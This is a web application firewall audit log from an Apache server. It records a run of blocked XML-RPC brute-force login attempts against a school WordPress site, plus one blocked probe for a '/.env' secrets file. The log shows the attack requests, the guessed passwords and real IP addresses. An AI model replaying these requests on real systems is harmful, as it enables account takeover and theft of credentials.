[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (18+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070086280868 5051 (- - -) Stopwatch2: 1745070086280868 5051; combined=3971, p1=480, p2=3301, p3=0, p4=0, p5=110, sr=87, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8eab94a-Z-- --439edc79-A-- [19/Apr/2025:20:42:28 +0700] aAOoREruoUXZj665VUHyJAAAANU 103.236.140.4 41164 103.236.140.4 8181 --439edc79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --439edc79-C-- wp.getUsersBlogs wakakur wakakur@1998 --439edc79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --439edc79-E-- --439edc79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070148449977 5540 (- - -) Stopwatch2: 1745070148449977 5540; combined=3961, p1=506, p2=3266, p3=0, p4=0, p5=110, sr=110, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --439edc79-Z-- --9eef1423-A-- [19/Apr/2025:20:43:32 +0700] aAOohHNa4dA2HllpK_N4hwAAAJM 103.236.140.4 41456 103.236.140.4 8181 --9eef1423-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9eef1423-C-- wp.getUsersBlogs wakakur wakakur@2004 --9eef1423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9eef1423-E-- --9eef1423-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070212752055 5459 (- - -) Stopwatch2: 1745070212752055 5459; combined=3842, p1=484, p2=3173, p3=0, p4=0, p5=107, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9eef1423-Z-- --ee948d27-A-- [19/Apr/2025:20:44:32 +0700] aAOowHNa4dA2HllpK_N4uQAAAJg 103.236.140.4 41744 103.236.140.4 8181 --ee948d27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ee948d27-C-- wp.getUsersBlogs wakakur tiffany --ee948d27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee948d27-E-- --ee948d27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070272209993 4278 (- - -) Stopwatch2: 1745070272209993 4278; combined=3248, p1=378, p2=2707, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee948d27-Z-- --1faa865c-A-- [19/Apr/2025:20:45:37 +0700] aAOpAUruoUXZj665VUHyfAAAANQ 103.236.140.4 42104 103.236.140.4 8181 --1faa865c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1faa865c-C-- wp.getUsersBlogs wakakur poopoo --1faa865c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1faa865c-E-- --1faa865c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070337257280 5568 (- - -) Stopwatch2: 1745070337257280 5568; combined=3862, p1=473, p2=3222, p3=0, p4=0, p5=98, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1faa865c-Z-- --ae1e956c-A-- [19/Apr/2025:20:46:43 +0700] aAOpQ3Na4dA2HllpK_N46gAAAJE 103.236.140.4 42454 103.236.140.4 8181 --ae1e956c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ae1e956c-C-- wp.getUsersBlogs wakakur london12 --ae1e956c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae1e956c-E-- --ae1e956c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070403642374 5568 (- - -) Stopwatch2: 1745070403642374 5568; combined=3971, p1=480, p2=3313, p3=0, p4=0, p5=104, sr=89, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae1e956c-Z-- --16a5bc15-A-- [19/Apr/2025:20:47:49 +0700] aAOphXNa4dA2HllpK_N4_AAAAIo 103.236.140.4 42762 103.236.140.4 8181 --16a5bc15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --16a5bc15-C-- wp.getUsersBlogs wakakur q1w2e3r4t5 --16a5bc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16a5bc15-E-- --16a5bc15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070469773143 5607 (- - -) Stopwatch2: 1745070469773143 5607; combined=3983, p1=498, p2=3215, p3=0, p4=0, p5=165, sr=89, sw=105, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16a5bc15-Z-- --2aaad52a-A-- [19/Apr/2025:20:48:51 +0700] aAOpw-vDiFC_ir7MDwbiKwAAAFc 103.236.140.4 43088 103.236.140.4 8181 --2aaad52a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2aaad52a-C-- wp.getUsersBlogs wakakur 123789 --2aaad52a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2aaad52a-E-- --2aaad52a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070531506408 5103 (- - -) Stopwatch2: 1745070531506408 5103; combined=3464, p1=446, p2=2868, p3=0, p4=0, p5=88, sr=83, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2aaad52a-Z-- --96a70e40-A-- [19/Apr/2025:20:49:51 +0700] aAOp_0ruoUXZj665VUHy8gAAAMI 103.236.140.4 43352 103.236.140.4 8181 --96a70e40-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --96a70e40-C-- wp.getUsersBlogs wakakur rootroot --96a70e40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96a70e40-E-- --96a70e40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070591062637 5316 (- - -) Stopwatch2: 1745070591062637 5316; combined=3788, p1=470, p2=3151, p3=0, p4=0, p5=98, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96a70e40-Z-- --1309ca44-A-- [19/Apr/2025:20:50:57 +0700] aAOqQevDiFC_ir7MDwbiQwAAAFg 103.236.140.4 43650 103.236.140.4 8181 --1309ca44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1309ca44-C-- wp.getUsersBlogs wakakur admin@888 --1309ca44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1309ca44-E-- --1309ca44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070657388197 5530 (- - -) Stopwatch2: 1745070657388197 5530; combined=3917, p1=488, p2=3263, p3=0, p4=0, p5=96, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1309ca44-Z-- --bb55cb64-A-- [19/Apr/2025:20:51:57 +0700] aAOqfUruoUXZj665VUHzKAAAANg 103.236.140.4 43990 103.236.140.4 8181 --bb55cb64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --bb55cb64-C-- wp.getUsersBlogs wakakur account --bb55cb64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb55cb64-E-- --bb55cb64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070717761574 5298 (- - -) Stopwatch2: 1745070717761574 5298; combined=4070, p1=490, p2=3394, p3=0, p4=0, p5=109, sr=92, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb55cb64-Z-- --0c6e5a3d-A-- [19/Apr/2025:20:52:56 +0700] aAOquOvDiFC_ir7MDwbiZQAAAFc 103.236.140.4 44268 103.236.140.4 8181 --0c6e5a3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.29.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.29.211 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --0c6e5a3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c6e5a3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745070776593669 805 (- - -) Stopwatch2: 1745070776593669 805; combined=358, p1=312, p2=0, p3=0, p4=0, p5=46, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c6e5a3d-Z-- --dcc5976e-A-- [19/Apr/2025:20:52:59 +0700] aAOqu3Na4dA2HllpK_N5VQAAAJE 103.236.140.4 44276 103.236.140.4 8181 --dcc5976e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --dcc5976e-C-- wp.getUsersBlogs wakakur 123abc --dcc5976e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dcc5976e-E-- --dcc5976e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070779127488 5647 (- - -) Stopwatch2: 1745070779127488 5647; combined=4005, p1=475, p2=3361, p3=0, p4=0, p5=100, sr=83, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dcc5976e-Z-- --17933035-A-- [19/Apr/2025:20:54:01 +0700] aAOq-UruoUXZj665VUHzbwAAAMQ 103.236.140.4 44614 103.236.140.4 8181 --17933035-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --17933035-C-- wp.getUsersBlogs wakakur 123312 --17933035-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17933035-E-- --17933035-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070841639779 5426 (- - -) Stopwatch2: 1745070841639779 5426; combined=3844, p1=513, p2=3169, p3=0, p4=0, p5=96, sr=89, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17933035-Z-- --52161170-A-- [19/Apr/2025:20:55:02 +0700] aAOrNnNa4dA2HllpK_N5fQAAAIM 103.236.140.4 45000 103.236.140.4 8181 --52161170-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --52161170-C-- wp.getUsersBlogs wakakur asdsa --52161170-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52161170-E-- --52161170-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070902008778 4561 (- - -) Stopwatch2: 1745070902008778 4561; combined=3126, p1=425, p2=2555, p3=0, p4=0, p5=85, sr=72, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52161170-Z-- --0762644f-A-- [19/Apr/2025:20:56:02 +0700] aAOrcuvDiFC_ir7MDwbiswAAAEY 103.236.140.4 45300 103.236.140.4 8181 --0762644f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0762644f-C-- wp.getUsersBlogs wakakur soccer --0762644f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0762644f-E-- --0762644f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745070962146358 5089 (- - -) Stopwatch2: 1745070962146358 5089; combined=3990, p1=475, p2=3326, p3=0, p4=0, p5=111, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0762644f-Z-- --5624b760-A-- [19/Apr/2025:20:57:06 +0700] aAOrsg6cTFSgLAHl7PrVTgAAAAU 103.236.140.4 45582 103.236.140.4 8181 --5624b760-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5624b760-C-- wp.getUsersBlogs wakakur qqii --5624b760-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5624b760-E-- --5624b760-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
